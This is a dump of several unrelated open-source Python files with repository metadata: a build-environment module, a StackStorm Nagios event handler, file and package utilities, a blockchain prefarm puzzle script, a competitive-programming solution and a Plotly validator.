% (self.name, lhs, rhs))
return self._combine(lhs, rhs)
def readout(self, value):
"""Processes `value` for inclusion in a build file. Most keys don't
need custom readout."""
if self._readout is not None:
return self._readout(value)
else:
return value
@property
def default(self):
"""Gets the default value for this key, or `None`."""
return self._default
def overrideable_string_key(name, default = None, readout = None,
help = None):
"""Makes an EnvKey with a given 'name' that will accept a single string and
allow overrides."""
def from_literal(lit):
assert isinstance(lit, str)
return lit
return EnvKey(
name,
from_literal = from_literal,
combine = lambda lhs, rhs: rhs,
default = default,
readout = readout,
help = help,
)
def overrideable_bool_key(name, readout = None, default = None, help = None):
"""Makes an EnvKey with a given 'name' that will accept a single bool and
allow overrides."""
def from_literal(lit):
assert isinstance(lit, bool)
return lit
return EnvKey(
name,
from_literal = from_literal,
combine = lambda lhs, rhs: rhs,
readout = readout,
default = default,
help = help,
)
def appending_string_seq_key(name, readout = None, default = (), help = None):
"""Makes an EnvKey with a given 'name' that will accept sequences of
strings and combine them by appending to yield a tuple."""
def from_literal(lit):
# A string can be iterated as a list of strings. This would produce
# confusing behavior. Avoid this by checking for str first.
assert not isinstance(lit, str) \
and all(isinstance(e, str) for e in lit), \
"Expected list of strings, got: %r" % lit
return tuple(lit)
return EnvKey(
name,
from_literal = from_literal,
combine = lambda lhs, rhs: lhs + rhs,
default = tuple(freeze(e) for e in default), # defensive copy
readout = readout,
help = help,
)
def prepending_string_seq_key(name, default = (), readout = None, help = None):
"""Makes an EnvKey with a given 'name' that will accept sequences of
strings and combine them by prepending. When extended by a delta at several
points in the build graph, this will order items produced by most-derived
targets first. (This is niche, but relevant when linking C programs.)"""
def from_literal(lit):
# A string can be iterated as a list of strings. This would produce
# confusing behavior. Avoid this by checking for str first.
assert not isinstance(lit, str) \
and all(isinstance(e, str) for e in lit), \
"Expected list of strings, got: %r" % lit
return tuple(lit)
return EnvKey(
name,
from_literal = from_literal,
combine = lambda lhs, rhs: rhs + lhs,
default = tuple(freeze(e) for e in default),
readout = readout,
help = help,
)
def frozenset_key(name, readout = None, default = (), help = None):
"""Makes an EnvKey with a given 'name' that will accept iterables of
strings and combine them into a unique frozen set."""
def from_literal(lit):
# A string can be iterated as a list of strings. This would produce
# confusing behavior. Avoid this by checking for str first.
assert not isinstance(lit, str) \
and all(isinstance(e, str) for e in lit), \
"Expected collection of strings for key %s, got: %r" % (name, lit)
return frozenset(lit)
return EnvKey(
name,
from_literal = from_literal,
combine = lambda lhs, rhs: lhs | rhs,
default = frozenset(freeze(e) for e in default),
readout = readout,
help = help,
)
class KeyRegistry(object):
"""Keeps track of environment key definitions."""
def __init__(self):
self._keys = {}
def define(self, key):
"""Defines a new environment key.
key: must be an EnvKey with a name that is unique in this registry.
"""
assert type(key) is EnvKey, \
"Expected EnvKey, got: %r" % key
assert self._keys.get(key.name) is None, \
"Key %s defined twice: first %r, then %r" % (
key.name, self._keys[key.name], key)
self._keys[key.name] = key
# Mapping-like implementation
def __contains__(self, key):
return self._keys.__contains__(key)
def __iter__(self):
return self._keys.__iter__()
def __getitem__(self, name):
return self._keys.__getitem__(name)
def get(self, name):
return self._keys.get(name)
def __len__(self):
return len(self._keys)
class Env(object):
"""An immutable mapping from keys to values, which can be extended in
predictable ways.
Environments can compute a *digest* of their contents, which is a
hexadecimal string. Cobble doesn't promise to derive the digest using any
particular means, and the means may change in later versions.
registry: the key registry for this environment.
prototype_dict: an initial key-value mapping for this environment. Keys and
values must be legal for the registry."""
def __init__(self, registry, prototype_dict = {}, *, _fresh = False):
self._registry = registry
if _fresh:
# Undocumented parameter _fresh is used to indicate that the dict
# does not need to be defensively copied/frozen. This is used
# within Cobble to construct environments with less memory traffic.
self._dict = prototype_dict
else:
# Assume that the dict can contain arbitrary mutable nonsense, and
# that the caller maintained a reference to it.
self._dict = {}
for k, v in prototype_dict.items():
self._dict[k] = freeze(v)
# Digest will be computed on-demand.
self._memoized_digest = None
# Equality / hash
def __eq__(self, other):
# We include the registry to treat environments from different
# registries as disjoint.
# We include the digest as a quick way of establishing inequality. We
# compare the entire dict to avoid the potential for digest collisions,
# which is vanishingly small, and would cause the build system to
# become incorrect, but hey -- let's be obviously correct here.
return self._registry is other._registry \
and self.digest == other.digest \
and self._dict == other._dict
def __hash__(self):
# Fast, constant-time hashing for environments whose digest has already
# been computed. Forces computation of the digest for other
# environments.
return hash(self.digest)
# Iterable/dict interface
def __contains__(self, key):
return self._dict.__contains__(key)
def __iter__(self):
return self._dict.__iter__()
def __getitem__(self, key):
"""The `__getitem__` implementation applies the key's readout function,
which may format or otherwise prepare the result, and falls back to the
key's default if present.
"""
# This implementation has the side effect that, if a key not present in
# the registry somehow makes its way into self._dict, getitem will not
# admit its presence.
key_def = self._registry.get(key)
if key_def is not None:
return key_def.readout(self._dict.get(key, key_def.default))
else:
raise KeyError("Use of undefined environment key %r" % key)
def __len__(self):
return self._dict.__len__()
def subset(self, keys):
"""Creates a new Env by deleting any keys not present in the given
list/set."""
return Env(
self._registry,
dict((k, v) for k, v in self._dict.items() if k in keys),
_fresh = True,
)
def subset_require(self, keys):
"""Returns an environment that contains the same values as 'self' for
the keys named in 'keys', and no others. This operation is used for
combination environment-filtering and error-checking.
If any key in 'keys' is missing in 'self', but the associated key
definition specifies a default value, the default value is copied into
the result.
The keys are interpreted as being required for success: if no default
value is available, it's an error.
"""
e = self.subset(keys)._copy_defaults(keys)
e.require(keys)
return e
def _copy_defaults(self, keys):
"""Produces a new Env containing the contents of this one, plus the
defaults for any missing keys."""
d = dict(self._dict)
for k in keys:
if k not in d:
default = self._registry[k].default
if default is not None:
d[k] = self._registry[k].default
return Env(self._registry, d, _fresh = True)
def without(self, matcher):
"""Returns a new Env that contains the same mappings as this one,
except for keys specified by 'matcher'.
'matcher' can be a predicate function taking one argument (a key name);
if it returns true, the key will be removed from the result.
'matcher' can also be a collection, in which case any key that is 'in
matcher' will be removed from the result.
"""
if isinstance(matcher, types.FunctionType):
            d = dict((k, v) for k, v in self._dict.items() if not matcher(k))
elif isinstance(matcher, (tuple, list, set, frozenset)):
d = dict((k, v) for k, v in self._dict.items() if k not in matcher)
else:
raise TypeError("Unexpected matcher: %r" % matcher)
return Env(self._registry, d, _fresh = True)
def readout_all(self):
"""Returns a 'dict' representation of this environment containing all
keys with explicit values. The values are passed through the readout
function for each key, equivalent to `self[k]`.
This can be used to prepare a version of this environment for use with
the `ninja_syntax` module, or for easy debug printing, etc.
"""
return dict((k, self[k]) for k in self._dict)
def derive(self, delta):
"""Creates a new Env that is identical to this one except for the
changes made by 'delta'.
Several types of primitives are accepted as deltas:
- Functions/lambdas. Functions are expected to take an environment as
their only argument, and return an environment.
- Dicts. Dict keys are environment key names; dict values are literal
expressions that will be converted to the appropriate type for the
environment key.
"""
if type(delta) is types.FunctionType \
and len(signature(delta).parameters) == 1:
return delta(self)
elif type(delta) is dict:
# Make a shallow copy of our backing dict.
new_dict = dict(self._dict)
# Apply each key in the delta to the copy.
for k, v in delta.items():
key_def = self._registry.get(k)
if key_def is None:
raise Exception("delta contained unknown key %s (=%r)"
% (k, v))
v = self.rewrite(v)
v = key_def.from_literal(v)
if k in self._dict:
new_value = key_def.combine(self._dict[k], v)
if new_value is None:
del new_dict[k]
else:
new_dict[k] = new_value
else:
new_dict[k] = v
# aaaand we're done. Inform the constructor that the dict is fresh
# to avoid an extra copy.
return Env(self._registry, new_dict, _fresh = True)
elif isinstance(delta, (list, tuple)):
return reduce(lambda env, delt: env.derive(delt), delta, self)
elif delta is None:
return self
else:
raise Exception("delta should be func or dict, got: %r" % delta)
@property
def digest(self):
"""Reads out the environment digest for 'self'.
The environment digest is a 'str' containing a hexadecimal number. It
is computed such that two environments with different contents will
have different digests. This means that comparing the digests of two
environments is an inexpensive way of telling if they are identical.
(Ignoring, for the moment, a very small risk of collisions in the
digest function.)
The digest is computed on demand the first time it is requested, and
then stored, so that later requests are cheap. This avoids unnecessary
work for short-lived intermediate environments.
The method for computing the digest is unspecified, i.e. Cobble may
change it in the future and you shouldn't rely on it.
"""
if self._memoized_digest is None:
# To make contents predictable, make a sorted list of key-value
# tuples. Normalize the values while we're here.
contents = sorted((k, _normalize(v)) for k, v in self._dict.items())
# To make contents binary, pickle them. Fix the protocol revision
# so we get more consistent results.
binary = pickle.dumps(contents, protocol = 3)
# To make the length of the contents predictable, hash them.
self._memoized_digest = hashlib.sha1(binary).hexdigest()
return self._memoized_digest
def rewrite(self, literal):
"""Rewrites 'literal' using information from this environment,
returning the rewritten version.
This implements the user-visible templating language available in BUILD
files.
Rewrites proceed as follows:
- For `str`, any environment key named with "$key" or "${key}" is
replaced by the value in this environment, as processed by the key's
readout function. If the key is missing, it's an error.
- For tuples or frozensets, each element is rewritten recursively.
- Booleans and None are returned verbatim.
"""
if isinstance(literal, str):
# The actual processing code, yaaaay
return string.Template(literal).substitute(self)
elif isinstance(literal, tuple):
return tuple(self.rewrite(elt) for elt in literal)
elif isinstance(literal, frozenset):
return frozenset(self.rewrite(elt) for elt in literal)
else:
return literal
def require(self, keys):
"""Asserts that this environment contains values for every key named in
'keys'. Default values count if the key's default value is not None."""
missing = [k for k in keys \
if k not in self._dict and self._registry[k].default is None]
if missing:
msg = "Required keys %r missing from environment" % missing
for m in missing:
h = self._registry[m].help
if h is None:
msg += '\n- \'%s\' has no description' % m
else:
msg += '\n- \'%s\': %s' % (m, h)
raise AssertionError(msg)
def freeze(x):
"""Attempts to make x immutable by converting it into a *frozen datum*.
Input can be str, bool, set, frozenset, list, tuple, None, and any nesting
of those.
Output will consist of str, bool, frozenset, tuple, and None only.
"""
if isinstance(x, str):
# Assume that strings are immutable.
return x
elif isinstance(x, bool):
# Bools too
return x
elif isinstance(x, (set, frozenset)):
return frozenset(freeze(v) for v in x)
elif isinstance(x, (list, tuple)):
return tuple(freeze(v) for v in x)
elif x is None:
return None
else:
raise TypeError("Value cannot be frozen for use in an environment: %r" %
x)
def is_frozen(x):
"""Checks whether 'x' is a frozen datum, something that could result from a
call to 'freeze'."""
return isinstance(x, (str, bool)) \
or x is None \
or (isinstance(x, (frozenset, tuple)) and all(is_frozen(e) for e in
x))
def _normalize(x):
"""Takes a frozen datum and converts sets to sorted tuples, ensuring that
any two data with the same logical contents have the same printed contents.
The result is still a frozen datum, technically, but set semantics are
erased. The result is mostly useful for generating predictable environment
hashes.
It's probably not necessary for this function to be particularly efficient,
because it's contributing to env digests, which are already expensive and
so memoized.
"""
if isinstance(x, (str, bool)) or x is None:
return x
if isinstance(x, frozenset):
return tuple(sorted(_normalize(e) for e in x))
assert isinstance(x, tuple)
return x
def prepare_delta(d):
"""Creates an environment delta from one of a few possible data types.
'd' may be:
- a function that takes an environment as a parameter and returns a new
environment.
- a 'dict', whose keys are environment key names as 'str', and whose values
can be passed to 'freeze'. When applied to an environment, the resulting
delta will pass the dict value and the old value (if any) to each key's
`combine` function.
- 'None', which means no changes.
- A list or tuple, which specifies a sequence of deltas to apply in order;
each element will be passed to 'prepare_delta' recursively.
"""
if isinstance(d, types.FunctionType):
return d
elif isinstance(d, dict):
return dict((k, freeze(v)) for k, v in d.items())
elif d is None:
return None
elif isinstance(d, (list, tuple)):
return tuple(prepare_delta(e) for e in d)
else:
raise TypeError("invalid delta: %r" % d)
def is_delta(d):
"""Checks if 'd' is a plausible environment delta."""
if d is None:
return True
if isinstance(d, types.FunctionType):
return True
if isinstance(d, dict):
return all(isinstance(k, str) and is_frozen(v) for k,v in d.items())
if isinstance(d, (list, tuple)):
return all(is_delta(e) for e in d)
return False
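# A minimal end-to-end sketch of the API above (the key names 'cc' and 'c_flags'
# are hypothetical examples, not keys defined by this module):
if __name__ == '__main__':
    registry = KeyRegistry()
    registry.define(overrideable_string_key('cc', default='gcc',
                                            help='C compiler to use'))
    registry.define(appending_string_seq_key('c_flags',
                                             help='extra C compiler flags'))

    base = Env(registry, {'c_flags': ['-Wall']})
    derived = base.derive({'cc': 'clang', 'c_flags': ['-O2']})

    print(derived['cc'])                        # 'clang' -- overrideable key, last write wins
    print(derived['c_flags'])                   # ('-Wall', '-O2') -- appending key
    print(derived.rewrite('compile with $cc'))  # 'compile with clang'
    print(base.digest != derived.digest)        # True -- different contents, different digests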
| 38.460854
| 82
| 0.622299
|
b655047b25f1797c56e017420180e441e6b5a021
| 5,614
|
py
|
Python
|
packs/nagios/etc/st2service_handler.py
|
jonico/st2contrib
|
149c9c553f24360d91a14fef7ea6146707de75fd
|
[
"Apache-2.0"
] | 5
|
2016-10-11T11:52:53.000Z
|
2017-06-15T05:21:05.000Z
|
packs/nagios/etc/st2service_handler.py
|
jonico/st2contrib
|
149c9c553f24360d91a14fef7ea6146707de75fd
|
[
"Apache-2.0"
] | 25
|
2016-07-28T17:50:35.000Z
|
2017-09-25T09:26:18.000Z
|
packs/nagios/etc/st2service_handler.py
|
jonico/st2contrib
|
149c9c553f24360d91a14fef7ea6146707de75fd
|
[
"Apache-2.0"
] | 2
|
2015-09-09T11:46:25.000Z
|
2020-11-21T10:10:49.000Z
|
#!/usr/bin/env python
import httplib
try:
import simplejson as json
except ImportError:
import json
import os
import sys
from urlparse import urljoin
try:
import requests
except ImportError:
raise ImportError('Missing dependency requests. Do ``pip install requests``.')
try:
import yaml
except ImportError:
raise ImportError('Missing dependency pyyaml. Do ``pip install pyyaml``.')
# ST2 configuration
ST2_CONFIG_FILE = './config.yaml'
ST2_API_BASE_URL = 'http://localhost:9101/v1'
ST2_AUTH_BASE_URL = 'http://localhost:9100'
ST2_USERNAME = None
ST2_PASSWORD = None
ST2_AUTH_TOKEN = None
ST2_AUTH_PATH = 'tokens'
ST2_WEBHOOKS_PATH = 'webhooks/st2/'
ST2_TRIGGERS_PATH = 'triggertypes/'
ST2_TRIGGERTYPE_PACK = 'nagios'
ST2_TRIGGERTYPE_NAME = 'service-state-change'
ST2_TRIGGERTYPE_REF = '.'.join([ST2_TRIGGERTYPE_PACK, ST2_TRIGGERTYPE_NAME])
STATE_MESSAGE = {
'OK': 'All is well on the Western front.',
'WARNING': 'We gots a warning yo!',
'UNKNOWN': 'It be unknown...',
'CRITICAL': 'Critical!'
}
REGISTERED_WITH_ST2 = False
OK_CODES = [httplib.OK, httplib.CREATED, httplib.ACCEPTED, httplib.CONFLICT]
def _create_trigger_type():
try:
url = _get_st2_triggers_url()
payload = {
'name': ST2_TRIGGERTYPE_NAME,
'pack': ST2_TRIGGERTYPE_PACK,
'description': 'Trigger type for nagios event handler.'
}
# sys.stdout.write('POST: %s: Body: %s\n' % (url, payload))
headers = {}
headers['Content-Type'] = 'application/json; charset=utf-8'
if ST2_AUTH_TOKEN:
headers['X-Auth-Token'] = ST2_AUTH_TOKEN
post_resp = requests.post(url, data=json.dumps(payload), headers=headers)
except:
sys.stderr.write('Unable to register trigger type with st2.')
raise
else:
status = post_resp.status_code
if status not in OK_CODES:
sys.stderr.write('Failed to register trigger type with st2. HTTP_CODE: %d\n' %
status)
            raise Exception('Failed to register trigger type with st2. HTTP_CODE: %d' % status)
else:
sys.stdout.write('Registered trigger type with st2.\n')
def _get_auth_url():
return urljoin(ST2_AUTH_BASE_URL, ST2_AUTH_PATH)
def _get_auth_token():
global ST2_AUTH_TOKEN
auth_url = _get_auth_url()
try:
resp = requests.post(auth_url, json.dumps({'ttl': 5 * 60}),
auth=(ST2_USERNAME, ST2_PASSWORD))
except:
raise Exception('Cannot get auth token from st2. Will try unauthed.')
else:
ST2_AUTH_TOKEN = resp.json()['token']
def _register_with_st2():
global REGISTERED_WITH_ST2
try:
url = urljoin(_get_st2_triggers_url(), ST2_TRIGGERTYPE_REF)
# sys.stdout.write('GET: %s\n' % url)
if not ST2_AUTH_TOKEN:
_get_auth_token()
if ST2_AUTH_TOKEN:
get_resp = requests.get(url, headers={'X-Auth-Token': ST2_AUTH_TOKEN})
else:
get_resp = requests.get(url)
if get_resp.status_code != httplib.OK:
_create_trigger_type()
else:
body = json.loads(get_resp.text)
if len(body) == 0:
_create_trigger_type()
except:
raise
else:
REGISTERED_WITH_ST2 = True
def _get_st2_triggers_url():
url = urljoin(ST2_API_BASE_URL, ST2_TRIGGERS_PATH)
return url
def _get_st2_webhooks_url():
url = urljoin(ST2_API_BASE_URL, ST2_WEBHOOKS_PATH)
return url
def _post_event_to_st2(url, body):
headers = {}
headers['X-ST2-Integration'] = 'nagios.'
headers['Content-Type'] = 'application/json; charset=utf-8'
if ST2_AUTH_TOKEN:
headers['X-Auth-Token'] = ST2_AUTH_TOKEN
try:
# sys.stdout.write('POST: url: %s, body: %s\n' % (url, body))
r = requests.post(url, data=json.dumps(body), headers=headers)
except:
sys.stderr.write('Cannot connect to st2 endpoint.')
else:
status = r.status_code
if status not in OK_CODES:
sys.stderr.write('Failed posting nagios event to st2. HTTP_CODE: %d\n' % status)
else:
sys.stdout.write('Sent nagios event to st2. HTTP_CODE: %d\n' % status)
def _get_payload(host, service, event_id, state, state_type, attempt):
payload = {}
payload['host'] = host
payload['service'] = service
payload['event_id'] = event_id
payload['state'] = state
payload['state_type'] = state_type
payload['attempt'] = attempt
payload['msg'] = STATE_MESSAGE.get(state, 'Undefined state.')
return payload
def main(args):
event_id = args[1]
service = args[2]
state = args[3]
state_type = args[4]
attempt = args[5]
host = args[6]
payload = _get_payload(host, service, event_id, state, state_type, attempt)
body = {}
body['trigger'] = ST2_TRIGGERTYPE_REF
body['payload'] = payload
_post_event_to_st2(_get_st2_webhooks_url(), body)
if __name__ == '__main__':
try:
if not os.path.exists(ST2_CONFIG_FILE):
sys.stderr.write('Configuration file not found. Exiting.\n')
sys.exit(1)
with open(ST2_CONFIG_FILE) as f:
config = yaml.safe_load(f)
ST2_USERNAME = config['st2_username']
ST2_PASSWORD = config['st2_password']
ST2_API_BASE_URL = config['st2_api_base_url']
ST2_AUTH_BASE_URL = config['st2_auth_base_url']
if not REGISTERED_WITH_ST2:
_register_with_st2()
except:
sys.stderr.write('Failed registering with st2. Won\'t post event.\n')
else:
main(sys.argv)
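# Setup sketch (all values below are placeholders, not taken from this file):
# the handler loads ./config.yaml with exactly the four keys read in __main__ above,
# and Nagios invokes it with six positional arguments in the order consumed by main().
#
# config.yaml:
#     st2_username: st2admin
#     st2_password: secret
#     st2_api_base_url: http://localhost:9101/v1
#     st2_auth_base_url: http://localhost:9100
#
# Example service event handler command (argv order: event_id, service, state,
# state_type, attempt, host):
#     st2service_handler.py 12345 http-check CRITICAL HARD 3 web01.example.com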
| 28.789744
| 92
| 0.636979
|
6c2262b4d65f8083f8456ce5ce012cb0dbd5f791
| 5,656
|
py
|
Python
|
backstage/core/funcs.py
|
pyrustic/backstage
|
d0cead248235026129e3743d43c12691342701fc
|
[
"MIT"
] | null | null | null |
backstage/core/funcs.py
|
pyrustic/backstage
|
d0cead248235026129e3743d43c12691342701fc
|
[
"MIT"
] | null | null | null |
backstage/core/funcs.py
|
pyrustic/backstage
|
d0cead248235026129e3743d43c12691342701fc
|
[
"MIT"
] | null | null | null |
import os
import os.path
import shutil
def get_app_pkg(project_dir):
"""
This function extracts the application package name from a project_dir path.
    Basically it extracts the basename from the path, then turns dashes "-" into
    underscores "_".
    Parameters:
    - project_dir: str, path to the project directory
Returns: str, the application package name.
"""
if not project_dir:
return None
basename = os.path.basename(project_dir)
cache = basename.split("-")
app_pkg = "_".join(cache)
return app_pkg
def get_project_name(project_dir):
"""Returns the project name"""
return os.path.basename(project_dir)
def ask_for_confirmation(message, default="y"):
"""
Use this function to request a confirmation from the user.
Parameters:
- message: str, the message to display
    - default: str, either "y" or "n", meaning "Yes by default" or "No by default".
Returns: a boolean, True or False to reply to the request.
Note: this function will append a " (y/N): " or " (Y/n): " to the message.
"""
cache = "Y/n" if default == "y" else "y/N"
user_input = None
try:
user_input = input("{} ({}): ".format(message, cache))
except EOFError as e:
pass
if not user_input:
user_input = default
if user_input.lower() == "y":
return True
return False
def wheels_assets(target):
dist_folder = os.path.join(target,
"dist")
if not os.path.exists(dist_folder):
return []
assets = []
for item in os.listdir(dist_folder):
_, ext = os.path.splitext(item)
if ext != ".whl":
continue
path = os.path.join(dist_folder, item)
if not os.path.isfile(path):
continue
assets.append(item)
assets = _sort_wheels_names(assets)
assets.reverse()
return assets
def copyto(src, dest):
"""
    Please make sure that DEST doesn't exist yet!
    Copy a file or the contents of a directory (src) to a destination file or folder (dest).
"""
if not os.path.exists(src) or os.path.exists(dest):
return False
if os.path.isdir(src):
try:
shutil.copytree(src, dest)
except Exception as e:
return False
else:
try:
shutil.copy2(src, dest)
except Exception as e:
return False
return True
def moveto(src, dest):
"""
If the DEST exists:
* Before moveto *
- /home/lake (SRC)
- /home/lake/fish.txt
- /home/ocean (DEST)
* Moveto *
moveto("/home/lake", "/home/ocean")
* After Moveto *
- /home/ocean
- /home/ocean/lake
- /home/ocean/lake/fish.txt
Else IF the DEST doesn't exist:
* Before moveto *
- /home/lake (SRC)
- /home/lake/fish.txt
* Moveto *
moveto("/home/lake", "/home/ocean")
* After Moveto *
- /home/ocean
- /home/ocean/fish.txt
Move a file or directory (src) to a destination folder (dest)
"""
if not os.path.exists(src) or os.path.exists(dest):
return False
try:
shutil.move(src, dest)
except Exception as e:
return False
return True
def package_name_to_path(target, package_name, prefix=""):
    # Converts a dotted package name into a regular pathname under 'target'.
# example: package_name_to_path("/home/proj", "view.lol", prefix="tests.")
return os.path.join(target, *((prefix + package_name).split(".")))
def build_package(target, package_name, prefix=""):
"""
    Literally builds a package; returns the string pathname on success, or None on failure.
    The package represented by 'prefix' must already exist.
"""
splitted = package_name.split(".")
dir = package_name_to_path(target, prefix) if prefix else target
for item in splitted:
dir = os.path.join(dir, item)
if not os.path.exists(dir):
try:
os.mkdir(dir)
except Exception as e:
pass
init_file = os.path.join(dir, "__init__.py")
if not os.path.exists(init_file):
try:
with open(init_file, "w") as file:
pass
except Exception as e:
pass
if not os.path.isdir(dir):
return None
return dir
def module_name_to_class(module_name):
"""
Convert a module name like my_module.py to a class name like MyModule
"""
name = os.path.splitext(module_name)[0]
# ...
if not "_" in name:
return strictly_capitalize(name)
else:
splitted = name.split("_")
cache = []
for x in splitted:
cache.append(strictly_capitalize(x))
return "".join(cache)
def strictly_capitalize(string):
    # Unlike str.capitalize(), this keeps the rest of the string unchanged
    # (str.capitalize() lowercases the remaining characters).
return string[0].upper() + string[1:]
def get_root_from_package(package_name):
"""
Return the root from a dotted package name.
Example the root here "my.package.is.great" is "my".
"""
splitted = package_name.split(".")
root = None
for x in splitted:
if x == "" or x.isspace():
continue
root = x
break
return root
def get_hub_url(res):
target = "https://api.github.com"
return "{}{}".format(target, res)
def _sort_wheels_names(data):
cache = list()
for name in data:
version = name.split("-")[1]
cache.append((version, name))
cache.sort(key=lambda s: [int(i) for i in s[0].split('.')])
return [name for version, name in cache]
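# A minimal usage sketch of the pure path/name helpers above (paths are illustrative):
if __name__ == '__main__':
    print(get_app_pkg('/home/alex/my-project'))           # 'my_project'
    print(get_project_name('/home/alex/my-project'))      # 'my-project'
    print(module_name_to_class('my_module.py'))           # 'MyModule'
    print(get_root_from_package('my.package.is.great'))   # 'my'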
| 26.805687
| 85
| 0.588048
|
59c1e9a1f818fed5d4fceed3bb333e8496da974e
| 2,210
|
py
|
Python
|
kale/wallet/puzzles/prefarm/make_prefarm_ph.py
|
inan0812/kale-blockchain
|
1b502fe21a4be10b4db0171c3a7030079dcefa1b
|
[
"Apache-2.0"
] | null | null | null |
kale/wallet/puzzles/prefarm/make_prefarm_ph.py
|
inan0812/kale-blockchain
|
1b502fe21a4be10b4db0171c3a7030079dcefa1b
|
[
"Apache-2.0"
] | null | null | null |
kale/wallet/puzzles/prefarm/make_prefarm_ph.py
|
inan0812/kale-blockchain
|
1b502fe21a4be10b4db0171c3a7030079dcefa1b
|
[
"Apache-2.0"
] | null | null | null |
from clvm.casts import int_from_bytes
from clvm_tools import binutils
from kale.consensus.block_rewards import calculate_base_farmer_reward, calculate_pool_reward
from kale.types.blockchain_format.program import Program
from kale.types.condition_opcodes import ConditionOpcode
from kale.util.bech32m import decode_puzzle_hash, encode_puzzle_hash
from kale.util.condition_tools import parse_sexp_to_conditions
from kale.util.ints import uint32
address1 = "txka15gx26ndmacfaqlq8m0yajeggzceu7cvmaz4df0hahkukes695rss6lej7h" # Gene wallet (m/12381/6333/2/42):
address2 = "txka1c2cguswhvmdyz9hr3q6hak2h6p9dw4rz82g4707k2xy2sarv705qcce4pn" # Mariano address (m/12381/6333/2/0)
ph1 = decode_puzzle_hash(address1)
ph2 = decode_puzzle_hash(address2)
pool_amounts = int(calculate_pool_reward(uint32(0)) / 2)
farmer_amounts = int(calculate_base_farmer_reward(uint32(0)) / 2)
assert pool_amounts * 2 == calculate_pool_reward(uint32(0))
assert farmer_amounts * 2 == calculate_base_farmer_reward(uint32(0))
def make_puzzle(amount: int) -> int:
puzzle = f"(q . ((51 0x{ph1.hex()} {amount}) (51 0x{ph2.hex()} {amount})))"
# print(puzzle)
puzzle_prog = Program.to(binutils.assemble(puzzle))
print("Program: ", puzzle_prog)
puzzle_hash = puzzle_prog.get_tree_hash()
solution = "()"
prefix = "xka"
print("PH", puzzle_hash)
print(f"Address: {encode_puzzle_hash(puzzle_hash, prefix)}")
result = puzzle_prog.run(solution)
error, result_human = parse_sexp_to_conditions(result)
total_kale = 0
if error:
print(f"Error: {error}")
else:
assert result_human is not None
for cvp in result_human:
assert len(cvp.vars) == 2
total_kale += int_from_bytes(cvp.vars[1])
print(
f"{ConditionOpcode(cvp.opcode).name}: {encode_puzzle_hash(cvp.vars[0], prefix)},"
f" amount: {int_from_bytes(cvp.vars[1])}"
)
return total_kale
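# Note: the quoted puzzle built above, (q . ((51 <ph1> <amount>) (51 <ph2> <amount>))),
# ignores its solution and simply returns two conditions with opcode 51 (CREATE_COIN),
# paying `amount` to each of the two puzzle hashes; parse_sexp_to_conditions then reads
# those conditions back out so the totals can be checked below.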
total_kale = 0
print("Pool address: ")
total_kale += make_puzzle(pool_amounts)
print("\nFarmer address: ")
total_kale += make_puzzle(farmer_amounts)
assert total_kale == calculate_base_farmer_reward(uint32(0)) + calculate_pool_reward(uint32(0))
| 35.645161
| 114
| 0.730769
|
6e9cbdf25d0ed5712a32a27da07516d481a1313a
| 497
|
py
|
Python
|
submissions/abc170/c.py
|
m-star18/atcoder
|
08e475810516602fa088f87daf1eba590b4e07cc
|
[
"Unlicense"
] | 1
|
2021-05-10T01:16:28.000Z
|
2021-05-10T01:16:28.000Z
|
submissions/abc170/c.py
|
m-star18/atcoder
|
08e475810516602fa088f87daf1eba590b4e07cc
|
[
"Unlicense"
] | 3
|
2021-05-11T06:14:15.000Z
|
2021-06-19T08:18:36.000Z
|
submissions/abc170/c.py
|
m-star18/atcoder
|
08e475810516602fa088f87daf1eba590b4e07cc
|
[
"Unlicense"
] | null | null | null |
def main():
import sys
read = sys.stdin.buffer.read
readline = sys.stdin.buffer.readline
readlines = sys.stdin.buffer.readlines
sys.setrecursionlimit(10 ** 7)
x, n = map(int, readline().split())
p = list(map(int, readline().split()))
check = float('inf')
ans = 0
for i in range(102):
if i not in p:
if check > abs(x - i):
ans = i
check = abs(x - i)
print(ans)
if __name__ == '__main__':
main()
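# Design note (an equivalent one-liner with the same tie-breaking, since min() keeps
# the first -- i.e. smallest -- candidate on ties, mirroring the strict '>' check above):
#     ans = min((i for i in range(102) if i not in p), key=lambda i: abs(x - i))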
| 22.590909
| 42
| 0.531187
|
6a4e77b481d87aa0d4c759ae681a0649d2628d5f
| 465
|
py
|
Python
|
env/lib/python3.8/site-packages/plotly/validators/cone/hoverlabel/font/_sizesrc.py
|
acrucetta/Chicago_COVI_WebApp
|
a37c9f492a20dcd625f8647067394617988de913
|
[
"MIT",
"Unlicense"
] | 76
|
2020-07-06T14:44:05.000Z
|
2022-02-14T15:30:21.000Z
|
env/lib/python3.8/site-packages/plotly/validators/cone/hoverlabel/font/_sizesrc.py
|
acrucetta/Chicago_COVI_WebApp
|
a37c9f492a20dcd625f8647067394617988de913
|
[
"MIT",
"Unlicense"
] | 11
|
2020-08-09T02:30:14.000Z
|
2022-03-12T00:50:14.000Z
|
env/lib/python3.8/site-packages/plotly/validators/cone/hoverlabel/font/_sizesrc.py
|
acrucetta/Chicago_COVI_WebApp
|
a37c9f492a20dcd625f8647067394617988de913
|
[
"MIT",
"Unlicense"
] | 11
|
2020-07-12T16:18:07.000Z
|
2022-02-05T16:48:35.000Z
|
import _plotly_utils.basevalidators
class SizesrcValidator(_plotly_utils.basevalidators.SrcValidator):
def __init__(
self, plotly_name="sizesrc", parent_name="cone.hoverlabel.font", **kwargs
):
super(SizesrcValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "none"),
role=kwargs.pop("role", "info"),
**kwargs
)
| 31
| 81
| 0.636559
|
be34738bb59daabfd90ef0829f8cf3234ffe7527
| 421
|
py
|
Python
|
addifintegers.py
|
manand881/Python-Programs
|
eb970cb1b21d4aede0102c60425eb8a1d4ac605c
|
[
"MIT"
] | null | null | null |
addifintegers.py
|
manand881/Python-Programs
|
eb970cb1b21d4aede0102c60425eb8a1d4ac605c
|
[
"MIT"
] | null | null | null |
addifintegers.py
|
manand881/Python-Programs
|
eb970cb1b21d4aede0102c60425eb8a1d4ac605c
|
[
"MIT"
] | null | null | null |
# Add two objects if both objects are an integer type
import sys
def add_ints(a, b):
if type(a) == type(b) == int:
return a + b
else:
        return None  # 'sys.exit' (uncalled) was a no-op here; return None explicitly, matching the example output below
print(add_ints(1,2)) # ===> 3
print(add_ints(1,'2')) # ===> None
# def add_numbers(a, b):
# if not (isinstance(a, int) and isinstance(b, int)):
# raise TypeError("Inputs must be integers")
# return a + b
# print(add_numbers(10, 20))
| 22.157895
| 57
| 0.586698
|
c371aefd75a154c71519efca1ad974c27e00d673
